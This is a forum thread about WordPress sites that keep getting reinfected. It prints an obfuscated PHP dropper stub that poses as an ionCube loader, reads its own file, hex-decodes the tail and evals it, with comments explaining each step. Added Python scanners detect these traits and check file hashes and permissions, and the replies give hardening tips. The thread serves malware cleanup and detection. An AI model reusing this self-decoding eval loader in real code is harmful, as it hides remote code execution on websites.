Malware
vangelder, 2018-03-23 14:12:43

How to get rid of the shell on Wordpress sites?

Good afternoon,
The situation is as follows:
There is a shared hosting account with about 10 WordPress sites on it. All sites have Wordfence, a plugin for protection against viruses and all sorts of rubbish. When it scans the sites, this plugin complains about files like xxxxx.php; the files can be located anywhere (in plugin folders, theme folders, WordPress folders). The file contains the following code:

The code:

<?php
if (!extension_loaded('IonCube_loader')) {
    $__oc = strtolower(substr(php_uname(), 0, 3));
    $__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');
    if (function_exists('il_exec')) {
        return il_exec();
    }
    $__ln = '/ioncube/' . $__ln;
    // the "loader path" above is a decoy: $__ln is immediately overwritten with a function name
    $__ln = "preg_replace";
    // the file opens itself for reading
    $__oid = @fopen(__FILE__, 'rb');
    $__id = realpath('extension_dir');
    $__here = dirname(__FILE__);
    if (strlen($__id) > 1 && $__id[1] == ':') {
        $__id = str_replace('\\', '/', substr($__id, 2));
        $__here = str_replace('\\', '/', substr($__here, 2));
    }
    $__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';
    $__i = strlen($__rd);
    while ($__i--) {
        if ($__rd[$__i] == '/') {
            $__lp = substr($__rd, 0, $__i) . $__ln;
            if ($__lp = fread($__oid, @filesize(__FILE__))) {
                // takes the tail of its own file (from offset 0xc7a-0x7ca = 0x4b0), strips uppercase
                // letters, "\r" and "\n" with preg_replace, hex-decodes the rest and evals it
                $__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc7a-0x7ca)));
                break;
            }
        }
    }
    eval($__ln);
    return 0;
} else {
    die('The file ' . __FILE__ . " is corrupted.\n");
}
if (function_exists('il_exec')) {
    return il_exec();
}
echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');
return 0;
?>
Files with such content have different creation dates (they can be dated a month ago, a year ago, etc.), i.e. it is impossible to trace where it came from.
After scanning the sites with the Wordfence plugin and deleting all these files, there was silence for a couple of days. And then everything starts again: files appear and Wordfence starts complaining.
Something similar is described here - Virus on WordPress site? - and there, scanning plus changing the database password and user passwords helped. In my case it does NOT work. As I said, in a couple of days everything starts again.
Maybe someone knows an effective solution to this ailment.
Thank you in advance.
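For anyone triaging the same stub, here is a small heuristic scanner, added as an example (it is not code from the question or from Wordfence). It walks a WordPress tree and reports PHP files that combine the traits the quoted sample shows: a variable function resolved to preg_replace, the file opening itself with fopen(__FILE__), pack("H*", ...) hex-decoding, eval() of the result, and the fake IonCube_loader check. The two sample files and the temporary directory layout are constructed for the demo; the trait names, MIN_HITS threshold and function names are this example's own choices.

```python
"""Heuristic detector for the fake "ionCube loader" PHP dropper quoted above.

Added example, not code from the original post. A file is reported only when
several of the traits co-occur, which keeps noise from legitimate code low.
"""
import os
import re
import tempfile

# Each pattern is one trait of the quoted stub (names are this example's own).
TRAITS = {
    "fopen_self":   re.compile(r"fopen\s*\(\s*__FILE__", re.I),
    "hex_unpack":   re.compile(r'pack\s*\(\s*["\']H\*["\']', re.I),
    "var_function": re.compile(r"\$__?\w+\s*=\s*[\"']preg_replace[\"']"),
    "eval_call":    re.compile(r"\beval\s*\(", re.I),
    "fake_ioncube": re.compile(r"IonCube_loader", re.I),
}
MIN_HITS = 3  # constructed threshold: how many traits must co-occur

def score_source(src: str) -> list[str]:
    """Return the names of the traits present in one PHP source text."""
    return [name for name, rx in TRAITS.items() if rx.search(src)]

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a site tree and return {relative path: traits} for suspicious PHP files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = score_source(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not crash the scan
            if len(hits) >= MIN_HITS:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

# Constructed samples: a shortened copy of the stub from the question and a benign plugin file.
DROPPER = r'''<?php
if (!extension_loaded('IonCube_loader')) {$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');
if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc7a-0x7ca)));}
eval($__ln);return 0;}
?>'''
BENIGN = r'''<?php
/* Plugin Name: Hello (constructed sample) */
function hello_greet() { return esc_html(__('Hello', 'hello')); }
add_action('init', 'hello_greet');
?>'''

def demo() -> dict[str, list[str]]:
    """Write the two samples into a temporary site tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        plugin_dir = os.path.join(root, "wp-content", "plugins", "hello")
        upload_dir = os.path.join(root, "wp-content", "uploads", "2018")
        os.makedirs(plugin_dir)
        os.makedirs(upload_dir)
        with open(os.path.join(plugin_dir, "hello.php"), "w") as fh:
            fh.write(BENIGN)
        with open(os.path.join(upload_dir, "xxxxx.php"), "w") as fh:
            fh.write(DROPPER)
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

Run it against a copy of the site root; every hit still needs a manual look, but a file that reads itself, hex-decodes its own tail and evals it has no business in a plugin or uploads folder. Finding the dropped files is only half of the job, since the question already shows that deleting them does not stop them from coming back; the scan is a way to measure whether the re-infection channel has actually been closed.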

4 answer(s)
Nikolay, 2018-03-23
@iNickolay

Maybe someone knows an effective solution to this ailment.

Of course we know: we need to find the virus and remove it.

Roman Mirilaczvili, 2018-03-23
@2ord

In general, the whole WP platform is full of holes, as is the bunch of plugins written for it.
You can try some solutions:

  1. install only proven modules for WP
  2. at a minimum, keep all software up to date at all times (OS + Apache/Nginx/etc + WP + modules): the latest versions with fixes for known CVE vulnerabilities.
  3. correctly configure the web server (including uploads), file and folder access rights, firewall, DBMS
  4. use an additional WAF

Ruslan, 2018-03-23
@Dvlbug

Set up a new server and move only WordPress to it. Compare hashes with the original distribution.
Install Tripwire and rkhunter, prohibit execution, and check folder permissions.
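The hash comparison Ruslan suggests, together with the permission checks from his answer and from item 3 of Roman's list, can be scripted. The example below is added here and is not code from either answer, from Tripwire or from WordPress. It builds a sha256 manifest of a known-good tree and of the live tree, reports modified, added and missing files, and separately flags PHP files under wp-content/uploads and world-writable directories. Both trees, the file contents and the version string are constructed in temporary directories for the demo; in practice the baseline is a fresh download of the same WordPress version, and wp-content/uploads and wp-config.php are compared against a backup rather than the distribution.

```python
"""Baseline integrity and permission check for a WordPress tree.

Added example (not from the thread). Function names and the sample trees are
this example's own; the "clean" tree stands in for an original distribution.
"""
import hashlib
import os
import stat
import tempfile

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def manifest(root: str) -> dict[str, str]:
    """{relative path: sha256} for every regular file under root."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            out[os.path.relpath(p, root).replace(os.sep, "/")] = sha256_file(p)
    return out

def diff_manifests(clean: dict[str, str], live: dict[str, str]) -> dict[str, list[str]]:
    """Split the live tree into modified / added / missing relative to the clean baseline."""
    return {
        "modified": sorted(p for p in clean if p in live and clean[p] != live[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }

def permission_findings(root: str) -> list[str]:
    """PHP files inside uploads (should never execute there) and world-writable directories."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(f"world-writable dir: {rel}")
        if rel.startswith("wp-content/uploads"):
            for fn in files:
                if fn.lower().endswith((".php", ".phtml")):
                    findings.append(f"php in uploads: {rel}/{fn}")
    return sorted(findings)

# Constructed sample trees (file contents are placeholders, not real WordPress code).
CLEAN_FILES = {
    "wp-load.php": "<?php require 'wp-config.php';\n",
    "wp-includes/version.php": "<?php $wp_version = 'X.Y.Z';\n",
}
LIVE_FILES = dict(CLEAN_FILES)
# the live copy has a core file tampered with and a dropped file in uploads
LIVE_FILES["wp-load.php"] += "@include 'wp-content/uploads/2018/xxxxx.php';\n"
LIVE_FILES["wp-content/uploads/2018/xxxxx.php"] = "<?php /* constructed stand-in for the dropper */\n"

def _populate(root: str, files: dict[str, str]) -> None:
    for rel, content in files.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)
    # pin directory modes so the demo does not depend on the current umask
    for dirpath, _d, _f in os.walk(root):
        os.chmod(dirpath, 0o755)

def demo() -> tuple[dict[str, list[str]], list[str]]:
    """Build both trees, make uploads world-writable on the live one, and run both checks."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        _populate(clean, CLEAN_FILES)
        _populate(live, LIVE_FILES)
        os.chmod(os.path.join(live, "wp-content", "uploads"), 0o777)
        return diff_manifests(manifest(clean), manifest(live)), permission_findings(live)

if __name__ == "__main__":
    changes, perms = demo()
    for kind, paths in changes.items():
        for p in paths:
            print(f"{kind}: {p}")
    for line in perms:
        print(line)
```

Re-run the manifest step after cleanup and again a few days later: if the "added" list fills up again while file permissions and the web server's upload handling are unchanged, the entry point is elsewhere (a compromised plugin, a leaked FTP/SFTP or hosting-panel credential, or another site on the same shared account writing into this one), and deleting the dropped files on their own will keep failing, as the question describes.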

SunHere, 2018-05-03
@SunHere

No plugin can find viruses with 100% certainty; even AI-Bolit skips infected files. Only a combined approach, signature-database scans plus semi-manual inspection, gives a good result.
